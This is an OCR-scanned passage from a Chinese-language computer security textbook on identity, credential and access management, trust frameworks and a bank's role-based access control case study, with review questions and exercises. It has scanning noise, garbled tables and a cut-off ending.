图 4-12 描述 了 ICAM 架构 的 逻辑 组 件 。 我 们 将 在 后 续 小 节 中 研究 每 一 个 主要 组 件 。 


4.7.1 身份 管理 


身份 管理 关注 的 是 将 属性 分 配 到 数字 身份 上 去 ,并且 将 数字 身份 与 个 体 或 NPE 连接 起 来 。 
其 目标 是 建立 一 个 独立 于 特定 应 用 或 情境 的 可 信 的 数字 身份 。 传 统 的 且 仍 在 广泛 使 用 的 应 用 
和 程序 访问 控制 方法 是 为 使 用 这 些 资源 创建 一 个 数字 化 表示 的 身份 。 结 果 ， 维 护 和 保护 身份 自 
身 被 视 为 仅 次 于 与 应 用 相关 的 任务 。 而 且 ， 建立 这 些 面 向 特定 应 用 的 身份 将 导致 大 量 重复 性 
工作 。 

与 用 来 登录 网 络 、 系 统 或 应 用 的 账户 不 同 ， 企 业 身份 记录 并 不 与 职位 、 职 责 、 位 置 或 者 是 
否 需 要 访问 特定 系统 相关 联 。 这 些 项 可 能 成 为 与 企业 身份 记录 相关 联 的 属性 ， 也 可 能 成 为 特定 
应 用 中 个 体 唯一 身份 标识 的 一 部 分 。 访 问 控制 决策 将 依据 情境 和 用 户 的 相关 属性 ， 而 非 仅仅 依 
据 其 身份 。 企 业 身 份 的 概念 是 ， 个 体 将 会 有 其 身份 的 单一 数字 化 表示 ， 用 来 实现 跨 部 门 、 跨 机 
构 的 多 种 用 途 ， 其 中 包括 访问 控制 。 


凭证 管理 身份 管理 





图 4-12 ”身份 、 和 凭证 和 访问 管理 (CAM) 


图 4-12 描述 了 身份 管理 的 核心 功能 。 数 字 身 份 的 建立 一 般 从 作为 和 人 职 过 程 一 部 分 的 身份 
数据 采集 开始 。 数 字 身 份 通常 是 由 一 组 属性 组 成 的 ， 这 些 属性 聚合 起 来 用 于 在 系统 或 企业 内 部 
唯一 标识 一 个 用 户 。 为 了 建立 对 数字 身份 所 代表 的 个 体 的 信任 ， 机 构 也 可 以 进行 背景 调查 。 个 
体 的 属性 可 以 保存 在 机 构 内 部 各 种 不 同 的 权威 源 ， 链 接 形 成 企业 视角 的 数字 身份 。 该 数字 身份 
可 以 提供 给 应 用 ， 以 便 支 持 物理 上 和 逻辑 上 的 访问 〈 访 问 管理 的 一 部 分 ) ; 当 不 再 需要 访问 时 
则 取消 提供 。 

身份 管理 的 最 后 一 个 要 素 是 生命 周期 管理 ， 包 括 以 下 内 容 : 

e 保护 个 人 身份 信息 的 机 制 、 策 略 和 规程 。 

o 控制 对 身份 数据 的 访问 。 

© 用 于 将 权威 身份 数据 分 享 给 相关 应 用 的 技术 。 

。 撤销 企业 身份 。 


4.7.2 RERE 


如 前 所 述 ， 凭 证 是 一 个 对 象 或 数据 结构 ， 其 将 身份 (及 可 选 的 附加 属性 ) 权威 地 绑 定 到 用 
户 所 拥有 并 控制 的 权 标 。 凭 证 的 实例 包括 智能 卡 、 私 有 /公开 密 钥 和 数字 证 书 。 和 凭证 管理 是 对 
和 凭证 生命 周期 的 管理 。 凭 证 管理 包括 下 列 5 个 逻辑 组 件 : 

1. 授权 的 个 体 发 起 需要 凭证 的 个 体 或 实体 建立 对 凭证 的 需求 。 例 如 ， 部 门 主 管 发 起 部 门 
员工 。 

2. 受 发 起 的 个 体 注册 凭证 ， 该 过 程 一 般 包括 证 明 身份 、 采 集 个 人 经 历 与 生物 特征 数据 。 这 
个 步骤 可 能 还 涉及 合并 由 身份 管理 组 件 维护 的 权威 属性 数据 。 

3. 凭证 生成 。 根 据 凭 证 类 型 ， 生 成 过 程 可 能 涉及 加 密 、 使 用 数字 签名 、 生 成 智能 卡 及 其 他 
功能 。 

4. 凭证 颁发 给 个 体 或 NPE。 

5. 最 后 ， 凭 证 必须 在 其 生命 周期 内 得 到 维护 ， 可 能 涉及 撤销 、 补 发 / 替换、 重新 注册 、 到 
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期 、 个 人 标识 码 (PIN) 重 置 、 挂 起 或 者 恢复 等 。 


4.7.3 访问 管理 


访问 管理 组 件 对 实体 被 授权 访问 资源 的 方法 进行 管理 和 控制 。 它 包括 逻辑 上 和 物理 上 的 访 
问 ， 可 以 在 系统 内 部 ， 也 可 以 在 外 部 单元 。 访 问 管理 的 目的 是 ， 确 保 当 个 体 试图 访问 安全 敏感 
的 建筑 物 、 计 算 机 系统 或 数据 时 ， 进 行 适当 的 身份 验证 。 访 问 控制 功能 单元 会 利用 请 求 访问 者 
提交 的 凭证 及 其 数字 身份 。 企 业 级 的 访问 控制 设施 需要 以 下 三 个 支持 要 素 : 

。 资源 管理 : 该 要 素 主 要 为 需要 访问 控制 的 资源 制定 规则 。 规 则 包括 凭证 要 求 和 访问 特 

定 功能 单元 中 的 特定 资源 所 需 的 用 户 属性 、 资 源 属性 和 环境 条 件 。 

e 特权 管理 : 该 要 素 主要 建立 和 维护 组 成 个 体 访问 轮廓 的 资格 或 特权 属性 。 这 些 属 性 代 
表 了 个 体 的 特征 ， 可 以 用 其 作为 制定 访问 物理 和 逮 辑 资源 决策 的 基础 。 特 权 被 认为 是 
可 以 链接 到 数字 身份 的 属性 。 

。 策略 管理 : 该 要 素 在 访问 交易 中 控制 什么 是 允许 的 ， 什 么 是 不 允许 的 。 也 就 是 说 ， 给 
出 了 请 求 者 的 身份 和 属性 、 资 源 或 客体 的 属性 和 环境 条 件 ， 策 略 将 规定 该 用 户 可 以 对 
该 客体 实施 哪些 操作 。 


474 身份 联合 


身份 联合 解决 两 个 问题 : 

1. 你 如 何 信任 需要 访问 自己 系统 且 来 自 外 部 组 织 的 个 体 的 身份 ? 

2. 当 贵 组 织 中 的 个 体 需要 与 外 部 组 织 合作 时 ， 你 如 何 保证 他 们 的 身份 ? 

“身份 联合 ”这 个 术语 用 来 描述 允许 一 个 组 织 信任 由 另 一 个 组 织 创 建 和 发 布 的 数字 身份 、 
身份 属性 与 凭证 的 技术 、 标 准 、 策 略 和 过 程 。 我 们 将 在 下 一 节 讨 论 身份 联合 问题 。 


4.8 信任 框架 


信任 、 身 份 、 属 性 等 相互 联系 的 概念 已 经 成 为 互联 网 企业 、 网 络 服务 提供 者 和 大 型 企业 
关注 的 核心 问题 。 这 可 以 从 电子 商务 建立 过 程 明显 地 看 出 来 。 为 了 提高 效率 、 保 护 隐私 并 简化 
法 律 程序 ， 交 易 各 方 一 般 采 用 “须知 ”准则 : 为 了 和 某 人 进行 交易 ， 你 需要 知道 他 哪些 信息 ? 
答案 随 情 况 而 变化 ， 可 以 包含 的 属性 诸如 : 职业 注册 或 执照 号 码 、 组 织 和 部 门 、 职 工 号 、 安 全 
许可 、 客 户 编号 、 信 用 卡号 、 唯 一 健康 标识 号 、 过 敏 史 、 血 型 、 社 会 保障 号 码 、 地 址 、 公 民 身 
份 、 社 会 网 络 地 址 、 笔 名 ， 等 等 。 个 体 的 属性 必须 被 知晓 并 且 验 证 后 才能 允许 进行 交易 ， 而 这 
些 属性 依赖 于 情境 。 

关于 属性 ， 同 样 需要 关注 的 问题 是 它 对 于 所 有 类 型 的 访问 控制 情形 都 愈 发 重要 ， 而 不 仅仅 
是 电子 商务 情境 。 例 如 ， 企 业 可 能 需要 为 客户 、 用 户 、 供 应 商 和 合作 伙伴 提供 资源 的 访问 。 根 
据 不 同 的 情境 ， 访 问 不 仅仅 取决 于 身份 ， 还 取决 于 请 求 者 和 资源 的 属性 。 


4.8.1 传统 的 身份 交换 方法 


在 线 或 网 络 交易 涉及 来 自 不 同 组 织 的 各 方 ， 交 易 可 能 在 组 织 和 个 体 用 户 〈 如 在 线 客户 ) 之 
间 完 成 ， 通 常 需要 共享 身份 信息 。 这 些 信息 除了 包括 简单 的 名 字 或 数字 标识 之 外 ， 可 能 还 包括 
大 量 相关 属性 。 不 论 是 披露 信息 方 还 是 接收 信息 方 ， 都 需要 对 与 该 信息 相关 的 安全 性 和 私密 性 
达到 一 定 的 信任 水 平 。 

图 4-13a 描述 了 传统 的 身份 信息 交换 技术 。 该 技术 包括 ， 用 户 开 发 随身 份 服务 提供 者 
(identity service provider) 采购 数字 身份 和 凭证 的 协议 ， 与 最 终 用 户 服务 与 应 用 提供 者 以 及 愿意 


#4 #4 101 


依赖 身份 服务 提供 者 生成 的 身份 与 凭证 信息 的 各 方 签订 协议 。 


( 可 能 的 合同 ) 





& eS 
2p X 
a) 传统 身份 信息 交换 中 涉及 的 三 方 关系 b) 身份 属性 交换 要 素 


图 4-13 ”身份 信息 交换 方法 


4-13a 中 的 方法 必须 满足 大 量 要 求 。 依 赖 方 (relying party) 要 求 用 户 已 经 通过 某 种 保障 
程度 的 身份 认证 ， 身 份 服务 提供 者 对 用 户 属 性 的 评估 是 准确 的 ， 身 份 服务 提供 者 提供 的 属性 是 
权威 的 。 身 份 服务 提供 者 要 求 确保 其 拥有 准确 的 用 户 信息 ， 并 且 如 果 其 分 享 信息 ， 依 赖 方 将 会 
依照 合同 条 款 和 法 律 要 求 使 用 这 些 信 息 。 用 户 要 求 确保 可 以 将 敏感 信息 委托 给 身份 服务 提供 者 
和 依赖 方 ， 且 他 们 将 遵守 用 户 偏好 ， 尊 重用 户 隐私 。 最 重要 的 是 ， 所 有 各 方 都 想 知道 其 余 各 方 
所 描述 的 情况 与 实际 情况 是 否 一 致 ， 以 及 其 余 各 方 的 可 靠 程度 有 多 高 。 


4.8.2 开放 的 身份 信任 框架 


如 果 没有 通用 的 标准 和 框架 ， 图 4-13a 中 的 协议 必须 被 复制 到 多 个 不 同情 境 中。 一 个 更 可 
取 的 方法 是 ， 开 发 一 种 开放 的 、 标 准 化 的 方法 来 交换 可 信赖 的 身份 和 属性 。 下 面 ， 我 们 来 研究 
这 种 越 来 越 得 到 认可 的 方法 。 

不 幸 的 是 ， 这 个 主题 有 着 许多 麻烦 的 缩写 ， 因 此 我 们 首先 给 出 这 些 最 重要 的 定义 : 

e OpenID : 这 是 一 个 开放 性 标准 ， 人 允许 用 户 通过 合作 网 站 (〈 称 为 依赖 方 ) 提供 的 第 三 方 
服务 实现 身份 认证 ， 从 而 不 需 网 站 管理 员 自 己 提供 相关 服务 ， 且 允许 用 户 整 合 自己 的 
数字 身份 。 用 户 可 以 选择 自己 喜欢 的 OpenID 身份 提供 者 创建 账户 ， 然 后 使 用 这 些 账 
户 登 录 任 何 接受 OpenID 认证 的 网 站 。 

OIDF : OpenID 基金 会 (OpenID Foundation) 是 由 承诺 使 用 、 推 广 和 保护 OpenID 技术 

的 个 人 和 公司 组 成 的 非 营利 性 国际 组 织 。OIDF 提供 OpenID 所 需 的 基础 设施 ， 并 且 帮 

助 促进 和 支持 OpenID 的 推广 使 用 。 

e ICF : 信息 卡 基 金 会 (Information Card Foundation) 是 由 致力 于 共同 发 展 信息 卡 生态 系 

统 的 公司 和 个 人 组 成 的 非 营 利 性 团体 。 信 息 卡 是 人 们 在 网 上 使 用 的 个 人 数字 身份 ， 是 

身份 元 系统 的 重要 组 成 部 分 。 每 张 信 息 卡 看 起 来 都 具有 卡片 形状 的 图 片 和 与 之 关联 的 

卡 名 ， 这 使 得 人 们 能 够 组 织 自己 的 所 有 数字 身份 并 且 很 便捷 地 选择 某 种 交互 环境 中 想 

用 的 数字 身份 。 

OITF: 开放 身份 信任 框架 (Open Identity Trust Framework) 是 一 个 标准 化 的 、 开 放 性 的 

用 于 身份 和 属性 交换 的 信任 框架 规范 ， 由 ODF 和 ICF 联合 开发 。 

© OIX: 开放 身份 交换 公司 ( Open Identity Exchange Corporation) 是 一 个 独立 且 中 立 的 遵 
循 开 放 身 份 信任 框架 模型 的 国际 证 书信 任 框架 提供 者 。 

© AXN : 属性 交换 网 络 (Attribute Exchange Network) 是 一 个 因特网 范围 的 在 线 网 关 ， 其 
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使 身份 服务 提供 者 和 依赖 方 能 够 以 可 负担 的 成 本 实现 高 效 访问 用 户 声称 、 许 可 且 已 验 
证 的 大 量 在 线 身 份 属 性 。 

系统 管理 者 需要 能 够 信任 与 主体 或 客体 相关 的 属性 是 权威 的 且 是 可 安全 交换 的 。 在 组 织 内 
部 提供 这 种 信任 的 一 个 方法 是 ICAM 模型 ， 具 体 来 说 是 ICAM 组 件 (图 4-12 )。 结 合 与 其 他 组 
织 共享 的 身份 联合 功能 ， 属 性 能 够 以 可 信赖 的 方式 交换 ， 以 支持 安全 访问 控制 。 

在 数字 身份 系统 中 ， 信 任 框架 (trust framework) 起 到 认证 程序 的 功能 。 它 使 得 接受 数字 
身份 凭证 的 一 方 〈 称 为 依赖 方 ) 能 够 信任 颁发 凭证 方 ( 称 为 身份 服务 提供 者 ) 的 身份 、 安 全 性 
和 隐私 策略 ， 反 之 亦 然 。OIX 将 信任 框架 更 形式 化 地 定义 为 ， 一 组 由 交易 各 方 中 的 每 一 方向 其 
对 手 方 做 出 的 可 验证 的 承诺 。 这 些 承诺 包括 : (1) 用 来 确保 承诺 兑现 的 控制 措施 (包括 规章 和 
合同 规定 的 义务 ) 和 (2 ) 履行 承诺 失败 时 的 补救 措施 。 信 任 框架 是 由 具有 相似 目标 和 观点 的 
人 组 成 的 团体 开发 的 。 它 规定 了 该 团体 参与 者 的 权利 和 职责 ; 制定 了 该 团体 特有 的 策略 和 标准 ; 
规定 了 用 来 提供 保障 的 团体 特有 的 过 程 和 规程 。 可 以 存在 不 同 的 信任 框架 ， 而 且 参 与 者 可 以 根 
据 其 特定 需求 来 裁剪 信任 框架 。 

4-13b 描述 了 OITF 所 包含 的 要 素 。 在 任何 组 织 或 机 构 内 部 ， 下 列 角色 是 总 体 框架 的 一 
部 分 : 

© 依赖 方 (Relying Party, RP): 也 称 为 服务 提供 者 ， 是 向 特定 用 户 交付 服务 的 实体 。RP 
必须 相信 其 目标 用 户 的 身份 和 属性 ， 并 且 必 须 依赖 用 来 表明 这 些 身 份 和 属性 的 各 种 
凭证 。 

e 主体 (subject): 他 们 是 RP 服务 的 用 户 ， 包 括 客 户 、 职 员 、 贸 易 伙伴 和 订户 。 

o 属性 提供 者 ( Attribute Provider, AP): AP 是 由 利益 共同 体 确认 能 够 验证 主体 所 提供 属 
性 的 实体 ， 它 通过 AXN 来 配备 ， 创 建 符合 AXN 规则 和 协议 的 属性 赁 证。 一 些 AP 将 
是 某 种 信息 的 权威 来 源 ， 更 多 情况 下 AP 是 派生 属性 的 代理 。 

e 身份 提供 者 (IDentity Provider, IDP): IDP 是 能 够 鉴别 用 户 凭证 并 且 保 证 主体 名 字 (或 
笔名 、 社 会 网 络 地 址 ) 真实 性 的 实体 ， 它 通过 AXN 或 者 其 他 兼容 的 身份 和 访问 管理 
(IDAM) 系统 来 配备 ， 创 建 可 以 用 来 索引 用 户 属 性 的 数字 身份 。 

AXN 还 包括 下 列 重要 的 支持 要 素 : 

© 评估 者 (assessor): 评估 者 对 身份 服务 提供 者 和 依赖 方 进行 评价 ,证 明 他 们 有 能 力 遵 循 
OITF 提供 者 的 蓝图 。 

e Hits (auditor): 审计 者 可 以 被 召集 来 检查 各 方 的 工作 是 否 与 OITF 约定 保持 一 致 。 

o 争端 调解 者 (dispute resolver): 根据 OLX 指南 提供 仲裁 和 争端 解决 方案 。 

o 信任 框架 提供 者 (trust framework provider): 信任 框架 提供 者 是 一 个 组 织 ， 其 将 策略 制 
定 者 的 要 求 转换 为 自己 的 信任 框架 的 蓝图 ， 并 以 与 OITF 规范 的 最 低 要 求 相 一 致 的 方 
式 着 手 构建 。 绝 大 多 数 情 况 下 ， 对 于 每 一 个 确定 自己 适宜 与 AXN 互通 的 工业 部 门 或 大 
型 企业 ， 都 有 相当 明显 的 候选 组 织 来 承担 这 个 角色 。 

4-13b 中 的 箭头 实 线 表示 与 信任 框架 提供 者 之 间 关 于 实现 技术 、 运 行 和 法 律 要 求 达成 的 
协议 。 箭 头 虚线 表示 受 这 些 需 求 潜在 影响 的 其 他 协议 。 一 般 来 说 ， 图 4-13b 所 说 明 的 模型 是 按 
照 下 述 过 程 运行 的 : 参与 组 织 内 部 的 负责 人 确定 交换 他 们 有 权 处 理 的 身份 信息 的 技术 、 运 行 
和 法 律 要 求 。 然 后 ， 他 们 选择 OITF 提供 者 来 实现 这 些 要 求 。 这 些 OITF 提供 者 将 这 些 要 求 转 
换 为 可 能 包含 其 附加 条 件 的 信任 框架 的 蓝图 。OITF 提供 者 对 身份 服务 提供 者 和 RP 进行 审查 ， 
并 与 他 们 签订 合同 ， 当 进行 身份 信息 交换 时 遵守 信任 框架 要 求 。 合 同 也 包括 与 争端 调解 者 和 审 
计 员 相关 的 条 款 ， 以 便 合同 解释 和 执行 。 
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49 案例 学 习 : 银行 的 RBAC 系统 


Dresdner 银行 实现 了 一 个 RBAC 系统 ， 它 可 以 作为 有 用 的 实际 例子 [SCHA01]。 银 行使 用 
多 种 计算 机 应 用 。 其 中 很 多 应 用 最 初 是 为 大 型 机 环境 开发 的 ， 这 些 老 应 用 中 有 一 些 现在 支持 客 
户 /服务 器 网 络 ， 其 他 的 保留 在 大 型 机 上 。 服 务 器 上 也 有 新 应 用 。1990 年 以 前 ， 在 每 台 服 务 器 
和 大 型 机 上 采用 简单 的 DAC 系统 。 管 理 员 在 每 台 主机 上 维护 本 地 访问 控制 文件 ， 为 每 台 主机 
上 的 每 个 应 用 的 每 个 用 户 定 义 访问 权 。 这 种 系统 操作 起 来 非常 烦琐 ， 非 常 耗 时 ， 易 于 出 错 。 为 
了 改进 系统 ， 银 行 引进 了 RBAC 方案 。RBAC 是 系统 级 的 ， 它 将 访问 权 的 确定 划分 为 三 个 不 
同 的 管理 单元 ， 以 获得 更 高 的 安全 性 。 

该 机 构 中 的 角色 是 按 职位 和 工作 职责 相 结合 来 定义 的 。 表 4-4a 提供 了 一 些 例子 。 这 与 
NIST 标准 根据 工作 职责 定义 的 角色 概念 略 有 不 同 。 在 某 种 程度 上 ， 区 别 仅仅 是 术语 方面 的 。 
无 论 如 何 ， 银 行 的 角色 构成 使 得 开发 基于 职位 的 继承 层次 结构 很 自然 。 在 银行 内 部 ， 每 个 机 构 
的 职位 之 间 存 在 严格 的 偏 序 关系 ， 反 映 出 职责 和 权力 的 层次 结构 。 例 如 ， 部 门 总 监 、 团 队 经 理 
和 职员 等 职位 是 按 降 序 排列 的 。 当 职位 与 工作 职责 结合 起 来 时 ， 就 会 产生 如 表 4-4b 所 示 的 访 
问 权 次 序 。 于 是 ， 金 融 分 析 师 / 团队 经 理 角 色 (角色 B) 比 金融 分 析 师 / 职员 角色 (角色 A) 具 
有 更 多 的 访问 权 。 该 表 说 明 角 色 B 与 角色 A 相 比 ， 对 于 三 个 应 用 具有 相同 的 或 更 多 的 访问 权 ， 
并 且 还 具有 第 四 个 应 用 的 访问 权 。 另 一 方面 ， 因 为 银行 业务 /团队 经 理 和 金融 分 析 师 / 职员 在 
不 同 的 职责 范围 工作 ， 所 以 他 们 之 间 没 有 层次 关系 。 我 们 因此 可 以 定义 角色 层次 如 下 : 一 个 角 
色 比 另 一 个 角色 高 级 ， 当 前 者 比 后 者 职位 高 且 二 者 职责 相同 。 角 色 层 次 使 得 按 表 4-4c 的 建议 
来 简化 访问 权 定义 成 为 可 能 。 


表 4-4 银行 业 实例 的 职责 与 角色 
















a) 职责 与 职位 
| emmm | maea PT 
电子 商务 支持 
银行 业务 部 站 总监 
b) 许可 分 配 c) 具有 继承 的 许可 分 配 
角 包 访 问 权 
1,2,3,4 
A 1, 2, 3,7, 10, 12 A 衍生 贸易 | 1,2,3,7, 10,12 
Lele MTS 1, 4, 8, 12, 14, 16 
1,2,3,4,7 
Eee 
j 14,613,146 B 
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在 原始 方案 中 ， 把 访问 权 直 接 分 配给 一 个 用 户 发 生 在 应 用 级 ， 并 与 一 个 应 用 关联 。 在 新 的 方 
案 中 ， 应 用 管理 模块 确定 与 每 个 应 用 关联 的 访问 权 集合 。 然 而 ， 完 成 指定 任务 的 指定 用 户 可 能 不 
具有 与 该 应 用 关联 的 所 有 访问 权 。 当 用 户 调用 一 个 应 用 时 ， 应 用 根据 集中 提供 的 安全 配置 授予 
访问 权 。 分 离 的 授权 管理 将 访问 权 与 角色 关联 起 来 ， 其 基于 用 户 所 属 的 角色 来 创建 安全 配置 。 

用 户 被 静态 分 配角 色 。 原 则 上 ， 每 个 用 户 可 以 被 静态 分 配 至 多 四 个 角色 ， 当 调用 某 个 应 用 
时 选择 一 个 给 定 角色 来 使 用 。 这 对 应 于 NIST 的 会 话 概念 。 实 践 中 ， 大 多 数 用 户 根据 其 职位 和 
工作 职责 被 静态 分 配 一 个 角色 。 

所 有 这 些 成 分 都 在 图 4-14 中 做 了 描述 。 人 力 资源 部 给 每 个 将 要 使 用 系统 的 职工 分 配 一 个 
唯一 的 用 户 ID。 该 部 门 还 根据 用 户 的 职位 和 工作 职责 给 他 们 分 配 一 个 或 多 个 角色 。 用 户 /角色 
信息 被 提供 给 授权 管理 模块 ， 后 者 为 每 个 用 户 创建 一 个 安全 配置 ， 而 用 户 是 与 用 户 ID 和 具有 
一 组 访问 权 的 角色 相关 联 的 。 当 用 户 调用 一 个 应 用 时 ， 这 个 应 用 查看 该 用 户 的 安全 配置 来 确定 
应 用 的 哪些 访问 权 对 于 具有 该 角色 的 用 户 是 有 效 的 。 








图 4-14 访问 控制 管理 实例 


一 个 角色 可 以 用 来 访问 几 个 应 用 。 因 而 ， 与 一 个 角色 关联 的 访问 权 集合 可 能 包含 未 与 用 户 
调用 的 任何 一 个 应 用 关联 的 访问 权 。 表 4-4b 说 明了 这 个 问题 。 角 色 A 具有 很 多 访问 权 ， 但 对 
其 调用 的 三 个 应 用 中 的 每 一 个 ， 都 只 有 这 些 访 问 权 的 一 个 子 集 是 可 用 的 。 

这 个 系统 中 的 某 些 特征 是 我 们 感 兴趣 的 。 在 银行 内 部 ， 有 65 个 职位 ， 从 支行 的 职员 到 支 
行经 理 ， 再 到 董事 会 成 员 。 这 些 职位 与 人 力 资源 数据 库 中 提供 的 368 个 不 同 工 作 职责 结合 起 
来 ， 形 成 潜在 的 不 同 角色 共 23 920 种 ， 但 现在 使 用 了 仅 约 1300 种 。 这 与 其 他 RBAC 实现 的 情 
况 一 致 。 平 均 起 来 ， 授 权 管 理 模块 每 天 分 发 给 应 用 42 000 个 安全 配置 。 
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[DOWN85] 是 一 篇 很 好 的 关于 DAC 基本 组 成 要 素 的 评述 性 文献 。[KAIN87] 清楚 地 探讨 了 
基于 能 力 的 访问 控制 。 

[SAND96] 是 关于 RBAC 的 全 面 综述 文章 ，[FERR92] 也 提供 了 一 些 非 常 有 价值 的 观点 。 
[BARK97] 分 析 了 基于 访问 控制 列表 的 RBAC 和 DAC 在 功能 方面 的 相似 性 。[SAUN01] 是 对 
RBAC 和 DAC 的 更 全 面 的 比较 。[FRAN12] 讨论 了 RBAC 的 优点 和 缺点 及 其 在 各 种 情境 中 的 
适用 性 。[FERR01] 和 [SAND00] 提供 了 NIST RBAC 标准 的 详尽 细节 。[COYN08] 描述 了 基于 
NIST 标准 的 INCITS RBAC 实现 和 互 操 作 标 准 。 

NIST SP 800-16 [HU13] 提供 了 关于 ABAC 模型 及 其 应 用 的 极 好 的 概述 。[CIOC11] 对 
ICAM 进行 了 清晰 且 详 尽 的 介绍 。[RUND10] 对 OITF 进行 了 有 用 的 概述 。[OIX13] 对 信任 框架 
和 属性 交换 网 络 进行 了 非常 详细 的 分 析 。 
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关键 术语 

access control (访问 控制 ) 

access control list (访问 控制 列表 ) 

access management (访问 管理 ) 

access matrix (访问 矩阵 ) 

access right (访问 权 ) 

attribute (属性 ) 

attribute-based access control ( ABAC， 基 于 属性 的 
访问 控制 ) 

Attribute Exchange Network (AXN， 属 性 交换 网 络 ) 

attribute provider (属性 提供 者 ) 

auditor (审计 者 ) 

authorizations (授权 ) 

assessor (评估 者 ) 

capability ticket (能力 权 证 ) 


cardinality (基数 ) 

closed access control policy (封闭 访问 控制 策略 ) 

credential (凭证 ) 

credential management (凭证 管理 ) 

discretionary access control (DAC， 自 主 访问 控制 ) 

dispute resolver (争端 调解 者 ) 

dynamic separation of duty (DSD ， 动 态 职责 分 离 ) 

entitlement (资格 ) 

environment attribute (环境 属性 ) 

general role hierarchy (通用 角色 层次 ) 

group (组 ) 

identity (身份 ) 

identity, credential, and access management ( ICAM, 
身份 、 和 凭证 和 访问 管理 ) 
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identity federation (身份 联合 ) 

identity management (身份 管理 ) 

identity provider (身份 提供 者 ) 

Information Card Foundation (ICF ， 信 息 卡 基金 会 ) 

kemel mode (内 核 模 式 ) 

least privilege〈 最 小 特权 ) 

limited role hierarchy ( 受 限 角色 层次 ) 

mandatory access control (MAC, ， 强 制 访 问 控制 ) 

mutually exclusive roles ( 互 斥 角色 ) 

object (客体 ) 

object attribute (客体 属性 ) 

open access control policy (开放 访问 控制 策略 ) 

Open Identity Exchange Corporation ( OIX， 开 放 身 
份 交换 公司 ) 

Open Identity Trust Framework ( OITF ， 开 放 身份 信 
任 网 络 ) 

OpenID Foundation (OIDF, OpenID 基金 会 ) 

owner (所 有 者 ) 

permission (许可) 


复习 题 


4.1 M DAC 5 MAC 的 区 别 。 
4.2 RBAC 如 何 与 DAC 和 MAC 联系 起 来 ? 
43 列 出 并 定义 访问 控制 系统 中 的 三 类 主体 。 


44 在 访问 控制 语 境 中 ， 主 体 与 客体 的 区 别 是 什么 ? 


4.5 什么 是 访问 权 ? 
46 访问 控制 列表 与 能 力 权证 的 区 别 是 什么 ? 
4.7 什么 是 保护 域 ? 
4.8 简要 定义 图 4-8a 中 的 四 种 RBAC 模型 。 


4.9 ” 列 出 并 定义 RBAC 基本 模型 中 的 四 种 实体 类 型 。 


4.10 ”描述 三 种 类 型 的 角色 层次 约束 。 


policy (策略 ) 

prerequisite role (先决 角色 ) 

privilege (特权 ) 

protection domain (保护 域 ) 

relying part (依赖 方 ) 

resource (资源 ) 

right (权利 ) 

role-based access control ( RBAC， 基 于 角色 的 访问 
控制 ) 

role constrains (角色 约束 ) 

role hierarchies (角色 层次 ) 

separation of duty (职责 分 离 ) 

session (会 话 ) 

static separation of duty (SSD ， 静 态 职责 分 离 ) 

subject (主体 ) 

subject attribute (主体 属性 ) 

trust framework (信任 框架 ) 

trust framework provider (信任 框架 提供 者 ) 

user mode (用户 模 式 ) 


4.11 Æ NIST RBAC 模型 中 ，SSD 与 DSD 的 区 别 是 什么 ? 


习题 


4.1 对 于 4.3 节 讨 论 的 DAC 模型 ,保护 状态 的 另 一 种 表示 方法 是 有 向 图 。 保 护 状 态 中 的 每 个 主体 和 每 个 
客体 都 用 结 点 表示 (单个 结 点 表示 既是 主体 又 是 客体 的 实体 )。 从 主体 指向 客体 的 有 向 线段 表示 访问 


权 ， 线 上 的 标记 定义 访问 权 。 
a. 画 出 对 应 于 图 4-2a 的 访问 矩阵 的 有 向 图 。 
b. 画 出 对 应 于 图 4-3 的 访问 和 矩阵 的 有 向 图 。 


c. 有 向 图 表示 与 访问 矩阵 表示 是 否 是 一 一 对 应 的 ? 解释 之 。 


4.2 a. 提出 一 种 用 访问 控制 列表 实现 保护 域 的 方法 。 


b. 提出 一 种 用 能 力 权证 实现 保护 域 的 方法 。 
提示 : 两 种 情况 都 需要 中 间 层 次 。 


4.3 VAX/VMS 操作 系 用 四 种 处 理 器 访问 模式 为 进程 间 保 护 和 共享 系统 资源 提供 方便 。 访 问 模式 确定 : 


44 


4.5 


4.6 


4.7 


4.8 
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o 指令 执行 权 : 处 理 器 可 以 执行 什么 指令 。 
o 存储 器 访问 权 : 当前 指令 可 以 访问 虚拟 内 存 的 哪些 单元 。 
四 种 模式 如 下 : 
o A: TT VMS 操作 系统 的 内 核 ， 包 括 存储 器 管理 、 中 断 处 理 和 IO 操作 。 
o 执行 者 : 执行 大 量 操作 系统 服务 调用 ， 包 括 文件 和 记录 (磁盘 和 磁带 ) 管理 例 程 。 
e@ BBS: 执行 其 他 操作 系统 服务 ， 如 对 用 户 命令 的 响应 。 
e 用 户 : 执行 用 户 程序 和 编译 器 、 编 辑 器 、 链 接 器 、 调 试 器 等 实用 程序 。 

运行 于 较 低 特权 模式 的 进程 常常 需要 调用 运行 于 更 高 特权 模式 的 过 程 。 例 如 ， 用 户 程序 请 求 操 
作 系 统 服务 。 这 个 调用 通过 使 用 改变 模式 (CHM) 指令 完成 ， 该 指令 产生 中 断 ， 将 控制 权 转 移 给 运 
行 于 新 访问 模式 的 例 程 。 然 后 执行 REI (从 异常 或 中 断 返 回 ) 指令 返回 。 
a 大 量 操作 系统 具有 两 种 模式 : 内 核 模式 和 用 户 模 式 。 那 么 ， 提 供 四 种 模式 而 非 两 种 模式 的 优点 和 

缺点 分 别 是 什么 ? 

b. 你 能 设计 一 种 比 四 种 模式 还 多 的 情况 吗 ? 
前 一 道 题 讨论 的 VMS 方案 经 常 被 称 为 环保 护 结构 ， 如 图 4-15 所 示 。 实 际 上 ， 简 单 的 内 核 /用 户 方 
案 是 一 个 双环 结构 。 环 结构 访问 控制 系统 的 缺点 是 它 违反 了 
“最 小 特权 ”原则 。 例 如 ， 如 果 我 们 希望 一 个 客体 在 环 X 中 可 
访问 ,但 在 环 7Y 中 不 可 访问 ， 就 需要 X<Y。 在 这 种 情况 下 ， 
所 有 在 环 X 中 可 访问 的 客体 在 环 Y 中 也 可 访问 。 
a. 详细 解释 上 述 问题 ， 并 说 明 为 什么 违反 了 最 小 特权 原则 。 
b. 提出 一 种 环 结构 操作 系统 能 够 处 理 这 个 问题 的 方法 。 
UNIX 将 文件 目录 与 文件 同等 对 待 ， 就 是 说 ， 都 用 相同 类 型 
结 点 来 定义 。 与 文件 一 样 ， 目 录 包 括 9 位 的 
保护 串 。 如 果 不 注意 ， 就 会 产生 访问 控制 问题 。 例 如 ， 考 虑 
一 个 保护 模式 为 644 (八进制 ) 的 文件 ， 它 包含 在 保护 模式 
为 730 的 目录 中 。 这 种 情况 下 该 文件 可 能 受到 怎样 的 安全 
